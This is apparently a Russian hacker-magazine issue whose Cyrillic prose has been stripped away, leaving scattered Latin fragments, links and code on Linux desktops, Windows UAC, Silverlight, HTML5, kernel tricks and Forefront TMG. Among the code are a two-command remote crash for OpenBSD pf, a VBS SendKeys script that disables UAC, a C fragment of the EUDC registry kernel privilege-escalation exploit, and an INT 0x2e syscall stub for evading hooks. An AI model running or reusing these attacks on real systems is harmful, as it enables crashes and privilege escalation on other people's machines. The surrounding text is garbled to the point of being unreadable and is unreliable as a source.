CoLinux--.
CoLinux cobd,
,
Windows. X- Xming, Windows ( ,
X , , ,
, Windows,
CoLinux ).
PulseAudio, Windows
.
CoLinux .
Linux- Windows, , .
, Windows
Linux ,

. /
/ ? Windows
, .
, CoLinux ,
Linux. ,
(, Ubuntu CoLinux
9.04). AndLinux (andlinux.org)
Ubuntu 22 2009 , (KDE
XFCE-, CoLinux Ubuntu
40 ).
AndLinux ,
Windows- (goo.gl/jKhyZ) ,
, Windows.
AndLinux ,


. CoLinux: 0.7.4 0.8.0. ,


. ,
CoLinux: 128 , 192 1 .
, Windows,
.
Xming, PulseAudio .
AndLinux , :
NT-. , CoLinux
, . AndLinux
(, UNIX,
),
Windows CoLinux: ,
CoFS Samba (
) , ,
.
CoLinux (, Windows, , ).
AndLinux, ,
freedesktop.
XFCE-: , ,
Thunar Synaptic. KDE- AndLinux KDE 3.5.
- CoLinux
, .

.

,
. -

, .
,
. z

Adept (adeptg@gmail.com)

*nix

,
31 000 000 OpenSource-, 2 000 000 000 . ,
, .
.

,
: , . 30 ,
. , 4.1BSD
( , ),
BSD-.
Samba . ,
2008 , . Samba,
OpenBSD libc ( ,
lib/libc/gen/{readdir.c,telldir.c},
).
Samba - ,
- . , -


BSD-, Mac OS X.
, ,
-. 33 .

.
2008. malloc OpenBSD, . sparc64 ,
C++
Internal Compiler Error.
yacc(1): skeleton.c, yyparse(),
.
OpenBSD ,
. (

Load_Cycle


OpenSource-

Mozilla Russia.
, . -,
The Mozilla Security Bug Bounty Program
, ,
( ,
).
$3000 :).
Chrome/Chromium
Vulnerability Rewards Program.
$500 $1337.

), UNIX V6
( 1975) UNIX V7.

GRUB2,
1.97 ,
.
,
GRUB
. , xakep,
xake, xak, xa
x. ,
, .
1.97.1.
Ping of Death OpenBSD Packet
Filter (CVE-2009-0687), 9 2009
.
,
kernel panic . .
, OpenBSD

.
OpenBSD pf 4.5, ,
NetBSD 5.0 RC3. , , :
nmap -sO $target_IP

hping -0 -H 58 $target_IP

,
OpenBSD,
.
, 2005 - ral(4) IPsec

,
2 -. .
.: ,
Wi-Fi.
,
remote crash, pf.conf,
isakmpd.conf isakmpd.policy, traceback ,
ddb(4).
,
. , ,
Android- HTC G1. ,
.
, , SMS reboot, <Enter>, ,
. !
G1
Debian. , ! :)

,
. ,
,
. ( , ) Ubuntu
.
,
( ).
.
(
).
Ubuntu ,
.
.

. ,
, .
smartmontools:

INFO

info
Ubuntu Hundred
Paper Cuts ,

100

,
.

HTTP://WWW
links



BSD:
goo.gl/qH316;
Ping of Death
OpenBSD:
goo.gl/uHoCj;
Linux:
goo.gl/LJ2B1.

$ sudo apt-get install smartmontools

sda, :
$ sudo smartctl -a /dev/sda | grep Load_Cycle

. 13 137,
. ,
,
600 000. /-


UNIXOID

bug#1 bugs.launchpad.net
,
, .
, ,
8.04 ( ). ,
APM (Advanced Power
Management):
$ sudo hdparm -B 254 /dev/sda

( ,
APM
APM ),
goo.gl/bTNhy,
.
, . ,
OpenSource . ,
*nix-. Nvidia. 2010
196.75 195.36.
. , ,
,
.
, .

, .
,
, , *nix-.
, , , :
Firefox *nix (goo.gl/Hiagm).
2001 , , Firefox 3 beta 2.

Russian hot keys bugfix. ,

Mozilla Russia. . Mozilla Russia
, .
$300 $500,
, , : goo.gl/dhYxN.
OpenSource- .
,
X.Org, ,
. :
, .
: ,
<Alt+Shift>.


Nautilus Filename Repairer .


:)
(Alt+Shift+Tab) .
X.Org 2004 : goo.gl/GaRqQ. , ( ),
, XKB. ,
, :).
, , XKB2 (
).
, Ubuntu (
11.04). X.Org
ppa. : goo.gl/7E6uK.
FreeBSD
.
: USB-, , , Kernel Panic.
FreeBSD
, USB-.
, , RAR ZIP-,
Windows. RAR , ,
:
$ sudo apt-get remove rar
$ sudo apt-get install unrar

ZIP . launchpad goo.


gl/Y5YVj, (,
) 1000 ( launchpad
), .
HundredPaperCuts
, .
(, , ). ,
.
1. AltLinux, .
2. AltLinux .
, ,
. zip/unzip,
libnatspec. Ubuntu ppa: goo.
gl/AFSQq ( zip/unzip) goo.gl/eGGAe (
libnatspec).
3. - unzip: goo.gl/0Bd9Y. ,

.
4. convmv ( ):
$ convmv -f cp866 -t utf8 -r --notest *

5. Nautilus:
$ sudo apt-get install nautilus-filename-repairer

zip-

OpenBSD remote crash vulnerability

#12309. 12309 -,
. , Linux vs FreeBSD vs
Windows.
. Large
I/O operations result in poor interactive performance and high iowait
times, 550 : goo.gl/uMKEn. 2008
P1 high. ,
, . :
$ dd if=/dev/zero of=/tmp/test bs=1M count=1M

, . wa ( LA),
, , ,
12309.
12309 , ,
. :
(
);
(, , );
USB-;
;
, :
1. - - -cfq. :
$ cat /sys/block/sdX/queue/scheduler

sdX ( sda).
.
:
# echo deadline > /sys/block/sdX/queue/scheduler

,
elevator=deadline. grub
GRUB_CMDLINE_LINUX_DEFAULT
/etc/default/grub, :
$ sudo update-grub

2. swap:
# echo 10 > /proc/sys/vm/swappiness

swap ,
10%. Ubuntu, , swappiness 60.
, /etc/sysctl.conf.
3. . swap.
4. -
2.6.17 2.6.34.
, 12309, < 2.6.35.
USB-.

Ubuntu, bugs.launchpad.net, 20 2004 Microsoft has a majority market share.
. :
Microsoft . Ubuntu
, . IT-, IT
.
.
:
.
:
1. .
2.
Ubuntu / .
:
1. Ubuntu.
2. Ubuntu , .
3.
.
,
619 , 1500 . :).

, OpenSource .
.
OpenSource ,
. z


UNIXOID
(execbit.ru)



.
,
.

. .
- ,
.
, fail safe,
Grub . , , ,
. KDE Gnome
,
.
: ( KDE
kdm, Gnome gdm) ,


(kdm gdm
, ).
.
ArchLinux Wiki (wiki.
archlinux.org). , .
/etc/inittab :
x:5:once:/bin/su _ -l -c "/bin/bash --login -c startx >/dev/null 2>/dev/null"

,

easystroke
(
: id:5:initdefault:).
,
, ~/.xinitrc. ,
KDE,
exec startkde, Gnome exec gnome-session,
Fluxbox exec fluxbox .
, ,

.

WM

,
,
. EWMH (Extended Window
Manager Hints), , ,
-,
(, WM
Gnome - , Metacity,
Gnome
), -,
EWMH- WM , - .
, - ,
EWMH-
WM. wmctrl,
,
, , . , wmctrl
,
,
.
. ,
,
. , -
( ).
,
WM,
. , wmctrl
:
Firefox Gnome Do

# vi ~/bin/wm-startup.sh
#!/bin/sh
# start the applications
chromium &
audacious &
xterm -e mcabber &
# give the windows time to appear
sleep 5
# move chromium to desktop 2 and make it fullscreen
wmctrl -r chromium -t 2
wmctrl -r chromium -b add,fullscreen
# shade the audacious window
wmctrl -r audacious -b add,shaded
# move the xterm with mcabber to desktop 2 and place it at (50,50), 600x300
wmctrl -r mcabber -t 2
wmctrl -r mcabber -e 0,50,50,600,300
# finally switch to chromium
wmctrl -a chromium

, mcabber
, , mcabber
, ,
, wmctrl.
, , -, wmctrl

, -, xterm ,

.
. , ,
. , ,
, IM-,
/ .
, , ,
, .
wmctrl:

INFO

info


xneur,
,
,

=

.
xneur


gxneur
(xneur.ru/downloads/).




xmodmap X.Org.


xbindkeys
(bit.ly/8aHUib).


UNIXOID

gxneur
800x600
$ wmctrl -r mcabber -b toggle,hidden

. , , , .
, , (, ,
, yakuake
tilde, ,
wmctrl ).

, , ,
:
(, ), ( , ).
.

UNIX-
. WM
, ,
,
, ( ).
, . , : WM
,
.
pytyle (pytyle.com), WM,
. WM
,
.
, .
:
$ sudo apt-get install python-xlib
$ wget http://goo.gl/V6rWY
$ tar -xzf pytyle-0.7.5.tar.gz
$ cd pytyle-0.7.5
$ sudo python setup.py install

:
$ pytyle


pytyle Ubuntu 10.10


,
pytyle WM,
.
<Alt+A>,
<Alt+U>.
<Alt+Z> ( ). - ,
,
. :
Alt+J / Alt+K ;
Alt+H / Alt+L ;
Alt+Shift+C ;
Alt+M ;
Alt+C ;
Alt+Shift+D / Alt+Shift+B
.

pytyle EWMH,
- WM (
EWMH- WM , , :
en.wikipedia.org/wiki/EWMH).

, Mac OS X - ?
, , , - , : , Launcher,
,
, <Alt+F2>.
,
:
, , , , , , . ,
.
( ) Mac OS X Launcher KDE4.
<Alt+F2>, ,
.
, . ,
Gnome XFCE - , , <Alt+F2>, .
. , Gnome Do (do.davebsd.
com) Launchy (launchy.net). .
, , mono

notify-send WM
Gnome Do QT Launchy (, , Linux
).

,

. , python, ruby , , ,
bash?
, bash .
,

.
zenity (live.gnome.org/Zenity). gdialog, , ,
dialog ( , ,
Slackware Linux).
,
, .
,
Hello World!:
$ zenity --info --text "Hello World\!"

('--entry'),
('--error'), ('--list'), - ('--progress'),
('--calendar') .
( ,
) ,
.
Zenity
, ,
notify-send.
. libnotify,
(
WM DE).
:
$ sudo apt-get install libnotify-bin
$ notify-send "Apache !"

:
$ notify-send -i gtk-dialog-info -u critical \
" 99%!"

Windows
Punto Switcher. ,

,
. Linux ( *nix) xneur (X Neural Switcher)
, Windows, ,
.
xneur ,
, , .
, xneur, .
xneur , Linux,
,
vim
xneur ( ,
).
xneur,
:
$ cp /usr/etc/xneur/xneurrc ~/.xneur/xneurrc

:
$ vi ~/.xneur/xneurrc
#
ManualMode Yes
# , xneur

SetAutoApp Pidgin
SetAutoApp Psi
SetAutoApp Gedit
SetAutoApp Chromium
# , xneur
ExcludeApp Focuswriter
ExcludeApp Wine

, ,
. ,
xneur ,
, , , .
.
xneur , :
xneur
Break ;
Shift+Break ;
Ctrl+Print ;
Alt+Scroll Lock
("" "privet");
Ctrl+Tab ;
Win+D

, xneur
, - , . , ,
, CapsLock,


UNIXOID

xneur

,
,
/ , .


,
. :
,
,
WM.
, xneur. xneurrc :


( ),
. :
, ,
, .
keytouchd,
,
( Debian/Ubuntu
).

,
.
,
, .
KDE, ,
.
: easystroke (sf.net/
apps/trac/easystroke):
$ sudo apt-get install easystroke

$ vi ~/.xneur/xneurrc
AddAction Alt t <cmd>gnome-terminal</cmd>
AddAction Alt g Gedit <cmd>gedit</cmd>
AddAction Super_L Nautilus <cmd>nautilus ~/</cmd>

,
, Google (Win+G) (Win+R).



,
.
.
.
KDE Gnome
, ,
- Fluxbox .
keytouch (keytouch.df.net),


,
.
. Add Action
, ( Command, ).

Stroke, .
() ( ,
).
, , (
, 10 10).
easystroke .


,
. , ,
. z

CODING
(stannic.man@gmail.com)

UAC

?

,
(UAC): ,
,
, .
, .
, UAC ?
Windows (, , ) ,
,
,
.
?,
: , ,
, ,
. , UAC , .


, ,
Windows.
,
,
. , ,
,
,
.

UAC
UAC
UAC ,
,
, . UAC

,
,
.
, UAC
, ,

Vista/7
UAC.
.

.

.
,
, .

API- ShellExecute
runas.
, ,
,

. : setup, install
update .

,
.
, ,

(appcompat).
, ,
RequireAdministrator RunAsInvoker.


requestedExecutionLevel.
XML-, . Windows XP
DLL Microsoft .NET Framework.
trustInfo (
Firewallsettings.exe) , Windows Vista requestedExecutionLevel. level
: asInvoker,
highestAvailable requireAdministrator.
<trustInfo
xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="requireAdministrator"
uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>

,
, ( Notepad.exe),
asInvoker.
,
.
highestAvailable. , , ,
AAM
,
.
,
highestAvailable,
Regedit.exe, Mmc.exe Eventvwr.exe. ,
requireAdministrator
,

.

uiAccess true
. ,


, %SystemRoot% %ProgramFiles%.
, , , Sigcheck Sysinternals. :
sigcheck -m <executable>. ,

DVD
dvd
DVD
,
,

UAC Windows 7.
,
(
?!),


.

HTTP://WWW
links



? Go for
zerodayinitiative.com
$1000
$10 000
!

INFO

info
:



!


CODING

'// ,
'// WshShell.Run "shutdown /r /f"

-, - , Windows Script
Host (WSH), , , , .
.
UAC , ,
.

UAC
, ( AIS, %SystemRoot%\System32\
Appinfo.dll), Service Host (%SystemRoot%\
System32\Svchost.exe), Consent.
exe (%SystemRoot%\System32\Consent.exe). Consent , , , ,
,
.
,
.

UAC

, , , , . UAC? , . , , .
(
Windows?), UAC , ,
. , .

UAC? !
++ C#
SendKeys, VBS-.
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.SendKeys("^{ESC}")
WScript.Sleep(500)
WshShell.SendKeys("change uac")
WScript.Sleep(2000)
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{ENTER}")
WScript.Sleep(2000)
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{ENTER}")
'//


, UAC?
, Windows UAC .
,
UAC .
WinAPI RtlQueryRegistryValues (msdn.microsoft.com),
, , RTL_QUERY_REGISTRY_TABLE,
__in__out .
( Microsoft)
API , ,
: HKCU\
EUDC\[Language]\SystemDefaultEUDCFont.
REG_BINARY, RtlQueryRegistryValues
.
API- Win32k.sys!NtGdiEnableEudc HKCU\EUDC\[Language]\SystemDefaultEUDCFont,
, REG_SZ,
UNICODE_STRING, ULONG (
).
REG_BINARY, ,
.

UINT codepage = GetACP();
TCHAR tmpstr[256];
_stprintf_s(tmpstr, TEXT("EUDC\\%d"), codepage);
HKEY hKey;
RegCreateKeyEx(HKEY_CURRENT_USER, tmpstr, 0, NULL,
REG_OPTION_NON_VOLATILE, KEY_SET_VALUE | DELETE, NULL,
&hKey, NULL);
RegDeleteValue(hKey, TEXT("SystemDefaultEUDCFont"));
RegSetValueEx(hKey, TEXT("SystemDefaultEUDCFont"), 0,
REG_BINARY, RegBuf, ExpSize);
__try
{
EnableEUDC(TRUE);
}
__except(1)
{
}
RegDeleteValue(hKey, TEXT("SystemDefaultEUDCFont"));
RegCloseKey(hKey);

UAC . , , Windows
VIsta/W7 , .
. - ,
Windows.
,
IDA Pro WinDBG.
! z

>> coding

3 -
: 12 , 6
3 .

, ? ? .
- .

CODING
(seva@vingrad.ru)

SILVERLIGHT

Silverlight-
Silverlight, Flash,
web- . , , ,
, web-
. , Silverlight- web-.
HTML-
JavaScript.
DOM, JS
- , .
Rich Internet Application (RIA). Silverlight
.
ActiveX Microsoft
. , ,
,
RIA-.
Silverlight .NET, , Silverlight , , ,

ActiveX, , ,
.

Silverlight

Silverlight ,
web-
.
, -trusted ( ) Silverlight- ,
.
Silverlight ,


:
in browser mode Silverlight-
web- (sandbox),
, , JavaScript.
, SL-
object, .
out of browser mode ,
.
,
, inbrowser, SL-
.
out of browser trusted mode
Silverlight- ,
,
.
in browser,
Silverlight-,
web-.
Silverlight- ,
.

Sandbox

sandboxed- :
user initiated


Silverlight
Rich Internet Application

Desktop
Applications

Web
Applications
RIA

Communication
Technologies

(, web-,
Silverlight) . KeyDown/KeyUp/MouseDown/
MouseUp.
, ,
. , , , - ,
, , .
same origin police
, , .
, , .

Silverlight:
1. OpenFileDialog/SaveFileDialog Silverlight
, ,
, .

. , Silverlight,
.
2. Webcam/Microphone SL- 4.0
web-,
, ,
. ,
SL- . : ,
web-.
3. Clipboard access 4.0 Silverlight
. ,
, .

Silverlight.
Silverlight isolated storage.
Silverlight
. Silverlight, ,


CODING


. 1 ,
.

- firewall Silverlight, , ,
, . SL ,
, ,
. Silverlight
, :
1. crossdomain.xml , Flash-:

Transparent
Silverlight-


Silverlight-
Transparent Code

<?xml version="1.0"?>
<cross-domain-policy>
<allow-http-request-headers-from domain="*"
headers="SOAPAction,Content-Type"/>
</cross-domain-policy>

SafeCritical Code

<?xml version="1.0" encoding="utf-8"?>


<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true"/>
</grant-to>
</policy>
</cross-domain-access>
</access-policy>

, <img> HTML, Image Media Silverlight



. - SL-, ,
. HTTP-, Silverlight
TCP/UDP-. ,
,
.
, TCP/
UDP- 4502-4534. . Silverlight- .

Silverlight
out of browser inbrowser-
Silverlight, ,
install Silverlight.
, SL- sandboxed,
trusted. Silverlight
, Silverligt-,
:
25 ;
( -trusted
, click jacking ,
- , ).
trusted-,


Silverlight Code

2. clientaccesspolicy.xml ,
Silverlight:

SecurityCritical Code

:
COM-;
/ ;
.
trusted Silverlight-
, , , ,
.


Silverlight-

JavaScript + HTML, Silverlight cross site scripting (XSS) ,


, -. XSS ,
-.
XSS HTML/JavaScript- , .
XSS- Silverlight- ,
, HTML/JavaScript.
XSS - , HTML. Silverlight- HTML-
XAML- , ,

mybox.Text = badString;

XamlReader.Load("<TextBlock xmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/presentation\" Text=\"" + badString + "\"/>");



http://foo.com

http://api.cool.com
http://foo.com/app.xap

, XSS- , SL- :
XamlReader.Load() ;
Assembly.Load() c Dll, ;
SL-
XAML- HTML- System.Windows.Browser;
SL- xap-
.
xap- . Silverlight-
, managed- , native-.
.
, XSS GIFAR-,
- ,
Silverlight , Silverlight-
Silverlight-
MIME Type application/x-silverlight-app.
, , .xap-
heap-spray ,
. native-,
, xap-, heap-spray
web-.

Silverlight-
?

Silverlight-,
, EnableHtmlAccess object,
Silverlight-. ,
SL- HTML- JavaScript.
true,

, false .
, Silverlight-
,
:
if (App.Current.Host.Settings.EnableHTMLAccess == false)
throw new Exception();
string htmlurl = System.Windows.Browser.HtmlPage.Document.
DocumentUri.ToString();
if (htmlurl != "http://my.com/my.html")
throw new Exception();

Silverlight- ,
:
(, )
Silverlight-, , , SQL ;
-
( referer Silverlight 4.0).
, . , IS
. , IS
. , -
DNS , .
IS XSS .

Silverlight- , , , , .
Silverlight-, ,
web-
. z


CODING

HTML5
HTML5

, ?
,
HTML5.
HTML5-,
.
HTML5?

HTML5 .
. HTML5 CSS3
,
web- .
JavaScript. API,
HTML5. , : HTML5
/ (JS, HTML5, CSS3 ),
web-.

HTML5 .
2007 .
W3C. HTML5
Web Application 1.0,
2004 . HTML5
, .
HTML5
22 2008 . ,
.
. , (FireFox


4, Google Chrome 10, IE9, Opera 11)


.

HTML5 , , . , ,

. , .

1: Drag&Drop

(,
, . .)
HTML5 File API Drag and Drop API.

. ,
Browse?
, .
.
.
,
,

?
,

HTML5.
. :
, HTML5
?. ,
JavaScript-
Modernizr (modernizr.com).
,
HTML5,
.
,
.
, ,
. Google
Chrome Internet Explorer 9. pr-
, Microsoft
, Google Chrome.

. ,

.
Drag&Drop
.
. ,
.
HTML5 , Drag&Drop .
Gmail. , ,
.
, .
: sample.html, style.css scripts.js. , ,
html-,
. HTML JS CSS.
, .
.
sample.html :
<!DOCTYPE html>
<html>
<head>
<link type="text/css" rel="stylesheet"
media="all" href="style.css" />
<script src="jquery.js" type="text/javascript"></script>
<script type="text/javascript" src="scripts.js"></script>
</head>
<body>

HTML5 FLASH
HTML5
. HTML5 CSS3.

Flash. ,
, Flash ,
HTML5/CSS3- (). ,
.

, .
, Canvasa: feedtank.
com/labs/html_canvas;
3D- Google:
addyosmani.com/resources/googlebox;
, .
.
. : mrdoob.
com/projects/chromeexperiments/ball_pool;
,
. : alteredqualia.
com/canvasmol;
-
? ,
. Google
WebGL, HTML5, CSS3 Flash.
, 3D- ,
.
. :
bodybrowser.googlelabs.com.

<div id="box"><span id="label"> </span>


</div>
</body>
</html>

JavaScript
jquery. html-.
,
.
div-. ,
.
, CSS.
style.css :
#box {
width: 500px;
height: 300px;
border: 2px dashed #000000;
background-color: #FCFFB2;
text-align: center;
color: #3D91FF;
font-size: 2em;
font-family: Verdana, sans-serif;


CODING

HTML5

-moz-border-radius: 8px;
-webkit-border-radius: 8px;
}
#label {
position: relative;
top: 2%;
}

box
(
). ,
dashed
. ,
: -moz-border-radius -webkitborder-radius.
.
- , .
web-, .
JavaScript:
$(document).ready(function() {
// attach the drag-and-drop handlers to the drop zone
var mybox = document.getElementById("box");
mybox.addEventListener("dragenter", dragEnter, false);
// "dragleave" is the standard event name; "dragexit" was Firefox-only
mybox.addEventListener("dragleave", dragExit, false);
mybox.addEventListener("dragover", dragOver, false);
mybox.addEventListener("drop", drop, false);
});
function dragEnter(evt) {
evt.stopPropagation();
evt.preventDefault();
}
function dragExit(evt) {
evt.stopPropagation();
evt.preventDefault();
}
function dragOver(evt) {
evt.stopPropagation();
evt.preventDefault();
}
function drop(evt) {
evt.stopPropagation();
evt.preventDefault();
var files = evt.dataTransfer.files;
var count = files.length;
if (count > 0)
handleFiles(files);
}
function handleFiles(files) {
// only the first dropped file is handled here
var file = files[0];
// textContent instead of innerHTML: a file name is untrusted input
// and must not be interpreted as markup
document.getElementById("label").textContent =
": " + file.name;
var reader = new FileReader();
reader.onprogress = handleReaderProgress;
reader.readAsDataURL(file);
}
function handleReaderProgress(evt) {
if (evt.lengthComputable) {
// compare with "===": the original used "=", which assigned
// evt.total to evt.loaded instead of comparing them
if (evt.loaded === evt.total) {
alert("...");
}
}
}

,
, JavaScript jquery,
. ,
. . , dragExit ,
,
.
, handleFiles().
(files[0])
. ,
.
, files. handleFiles() .
label (
?) , ,
FileReader(). :
html5rocks.com/tutorials/file/dndfiles.
onProgress FileReader().
, . :
, , , .

2: , ,

HTML5 web
flash-. ,
.

GAPI.
:


( Flash Player )
. HTML5
- -.
, , <audio>
<video>. -
. , . ,
, ,
Chrome,
FireFox . ,
Flash-. (, - ,
- . ) ,
.
:
<!DOCTYPE html>
<html><body><video src="video-for-sample-1.mp4"
poster="screen-for-sample1.jpg" controls>
. ,
.
</video></body></html>

, <video>
poster. ,
.
? , /.
<audio> .
. ,
(ogg,
mp3). mp3,
ogg. ,
, .

3: Where are you now


(geolocation API)

Geolocation API .
, , Google Maps. ? ! ,
Twitter Geolocation
API web- -.
,
, .
, : GAPI ?. ,
- .
IP-, Wi-Fi , GPS (
), GSM cell ID .
, ][
Step , , .

<!DOCTYPE html>
<html>
<body>
<div id="coords">: <span id="latitude">Unknown</span>
<br />: <span id="longitude">Unknown</span><br />
</div>
<script type="text/javascript">
if (navigator.geolocation) {
navigator.geolocation.getCurrentPosition(
function (position) {
document.getElementById("latitude").innerHTML =
position.coords.latitude;
document.getElementById("longitude").innerHTML =
position.coords.longitude;
},
// error callback: called when the user denies access
// or no position could be determined
function (error) {
document.getElementById("coords").innerHTML =
"Error: " + error.message;
}
);
}
</script>
</body>
</html>

, ,
GAPI. geolocation true,
. getCurrentPosition
navigator. , .

4:

web-
. MySQL, SQLite , . HTML SQLite . !
, ?
, . , .
.
, .
, IE9 FF4 , Google Chrome.
,
:
var db = openDatabase("xakep", "1.0", "test", 8192);
// executeSql is only available inside a transaction callback
db.transaction(function (tx) {
tx.executeSql("create table if not exists " +
"checkins(id integer primary key asc, field_number_one string)",
[], function() { console.log(" "); });
});

,
,
, SQLite: ,
.

HTML5.Shutdown()

HTML5 . ,
.
, HTML5-
. ,
, ,
. ( ).
,
. ! z


CODING
(stannic.man@gmail.com)

,

TLS

, , . !
(
:)), .

#1,
El pueblo unido jamas sera vencido!

, ? Windows
( ) , ,
, .
.

Windows ******, . ,
,
, ,
. WinAPI- RtlAdjustPrivilege,
AdjustTokenPrivileges . , WinAPI
ExitWindowsEx() ,
, ( ):
VOID shutdownSystem()
{
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
{...}
// enable SE_SHUTDOWN_NAME on the process token before ExitWindowsEx
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,
&tkp.Privileges[0].Luid);
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,
(PTOKEN_PRIVILEGES)NULL, 0);
if (!ExitWindowsEx(...))
{...}
}

, Windows (
) , ,
: -


!

( ) , . , Windows Vista
.
.
, , ,
? :). , :
, , . , , , , ,
.
?, . , , . ,
!
, ,
kernel32.dll ntdll.dll, . , kernel32.
dll ntdll.dll . ,
: kernel32!CreateFileW
ntdll!NtCreateFile [ INT 0x2e] ntos!ZwCreateFile (...).
,
Nt*-
INT 0x2e
kernel32!CreateFileW ntdll!NtCreateFile. , ,
INT 0x2e, .
,
! , INT 0x2e
Windows 2000. WinXP SYSENTER, INT 0x2e
.
, , :
__declspec(naked) NTSTATUS __cdecl NtCallStub(
__in ULONG SdtNumberOfFunc, ...)
{
__asm
{
mov eax, [esp+4]
lea edx, [esp+8]
int 0x2e
ret
}
}
// SdtNumberOfFunc Nt*-
// SSDT


NT*- RtlAdjustPrivilege. ?
. , x64- ,
SYSENTER (,
,
SYSENTER).
INT 0x2e :

. , , -
WinAPI NtCreateKey().
ntdll.dll, (,
). ,
, NtCreateKey

INT 0x2e .
ZwCreateKey,
. ,
ntdll.dll!NtCreateKey,
. - , , NtCreateKey, ,
- ,
.
, ,
ntdll.dll!NtCreateKey INT 0x2e. ,
-,
, -
API NtCreateKey()
,
.
,
INT
0x2e ( SYSENTER).
, .

#2,

,
( ,
, )
,

DVD
dvd
DVD

,

.

HTTP://WWW
links
ReactOS
(
Windows):
alex-ionescu.com


CODING

.
,
JUMP --.
if( threadHandle = OpenThread(THREAD_GET_CONTEXT, FALSE,
currThreadEntry.th32ThreadID ) )
{
StartAddress = GetThreadStartAddress( threadHandle );
if( ( StartAddress < 0x00401000 ||
StartAddress > 0x0040156B ) && StartAddress < 0x70000000 )
{
//
}
else
{
NtGetContextThread( threadHandle, &ctx );
if( ( ctx.Eip < 0x00401000 || ctx.Eip > 0x0040156B )
&& ctx.Eip < 0x70000000 )
//
}
NtClose( threadHandle );
}

NtGetContextThread
INT 0x2e .
, ,
. , ,
INT 0x2e.

#3
malloc/realloc

, malloc ExAllocatePool,
, realloc .


? malloc/realloc,
ExAllocatePoolWithTag (
ExAllocatePool, MSDN, ,
ExAllocatePoolWithTag).
VOID * malloc(ULONG size)
{
// the pool tag is a ULONG, not a string: ' gaT' shows up as "Tag " in pool viewers
PVOID data = ExAllocatePoolWithTag(PagedPool, size, ' gaT');
if (!data)
return 0;
RtlZeroMemory(data, size);
return data;
}

, , realloc:
VOID * realloc(PVOID memPtr, ULONG size, ULONG oldSize)
{
PVOID newPtr = ExAllocatePoolWithTag(PagedPool, size, ' gaT');
if( !newPtr )
return 0;
if ((oldSize) && (memPtr))
{
// copy only what fits: copying oldSize bytes into a smaller block overflows it
RtlMoveMemory( newPtr, memPtr, (oldSize < size) ? oldSize : size);
ExFreePoolWithTag(memPtr, ' gaT');
}
return newPtr;
}

, , ,
, , .
! z

SYN/ACK

TMG 2010

TMG, NIS, GAPA


, . ,
, .
.


, .
, TMG 2010.

TMG 2010

ISA 2006 TMG (Threat Management Gateway) 2010


Forefront, . TMG

. TMG 2010 , VPN,

URL-.
ISA? TMG 64- ,
Windows Server 2003 . TMG .
TMG ,
, ISA 2006,
, ,
(. 1).
, web-
(. 2). Web
Access Policy HTTPS.
SSL-, SSL bridging. HTTPS inspection (. 2)
,
Man-in-the-middle.
(HTTPS inspection
certificate),
. HTTPS inspection SSTP-
.
, HTTPS inspection
Extended Validation (EV) SSL,



.
E-Mail Policy -
.
SSTP.

(. 3), IP- ,
Behavioral
Intrusion Detection (. 4). ISA 2006 IPv6 TMG
Direct Access.
SIP (Session Initiation Protocol). ,
Intrusion Prevention System
Network Inspection
System (NIS).

(Intrusion-Detection System
IDS) ( ), ,
,
.
(Intrusion Prevention Systems IPS),
IDS, ,
.
IDPS , ,
. IDPS (Network Based IDPS
NIDPS)
. IDPS (Host Based
IDPS HIDPS) (
), ,
.
IDPS ,
. Anomaly Based IDPS Policy Based IDPS
,

TMG
NIS
GAPA

1. NIS Guide to Configuring, Monitoring, and Troubleshooting the Network Inspection System (NIS)
in Forefront Threat Management Gateway (TMG) 2010:
download.microsoft.com;
2. ,
NIS:
technet.microsoft.com/en-us/library/ff382649.aspx;
3. GAPA GAPAL,
:
research.microsoft.com/pubs/70223/tr-2005-133.pdf;
4.
Forefront Edge:
technet.microsoft.com/en-us/library/cc891502.aspx;
5. Microsoft Malware Protection Center (MMPC):
microsoft.com/security/portal;
6. SDK TMG 2010:
microsoft.com/downloads/en/details.aspx?displaylang=en&Family
ID=8809cfda-2ee1-4e67-b993-6f9a20e08607.

, IT-Academy
& Softline
Microsoft Certified Professional (MCP)
Microsoft Certified Systems Administrator:
Security (MCSA: Security)
Microsoft Certified Systems Engineer: Security
(MCSE: Security)
Microsoft Certified Technology Specialist: Windows Server 2008
Active Directory, Configuration; Windows Server 2008 Network
Infrastructure, Configuration
Microsoft Certified Trainer (MCT)
Oracle Certified Associate (OSA)
Oracle Certified Professional (OCP)


, . 80%
,
, .

Network Inspection System (NIS)

NIS Generic Application


Level Protocol Analyzer (GAPA), Microsoft Research
(MSR). GAPA
GAPA Language (GAPAL),
.
NIS (IDS) . IDPS (, ++), GAPA

.
NIS IPS,
. ,

, ,
. ,
, ,
,
.
, NIS
. ,
NIS ,
Microsoft. , NIS
web-, .
TMG Malware Inspection.
NIS : HTTP, DNS,
SMB, MSRPC, SMTP, POP3, IMAP, MIME.

, . ,
,
(. 5). , ,
NIS User
Defined Protocol ,


SYN/ACK

. 1. Forefront TMG Management


NIS. NIS ,
Firewall policy.
, (.
6). Allow, to avoid blocking legitimate
traffic , ,
.
,
.
RFC,
Block, to tighten
security.

NIS

TMG 2010 .
Preparation Tool, (, .Net Framework 3.5.1),
Installation Wizard. ,
Getting Started Wizard, No
network adapters could be identified.
, - TMG
. Security
Configuration Wizard (SCW), TMG 2010.
NIS Getting Started Wizard,
Roles Configuration. . 7 ,
NIS . NIS
(. 6).
NIS. NIS
, 30%
. ,
. ,
, ,
. NIS. ,
Domain Name Set, http-.


. 2. Web Access Policy


NIS Properties
.
NIS, Other.
Test. Test:Win/NIS.HTTP.Signature!0000-0000 , SecureNAT
TMG, http://www.contoso.com/testNIS.
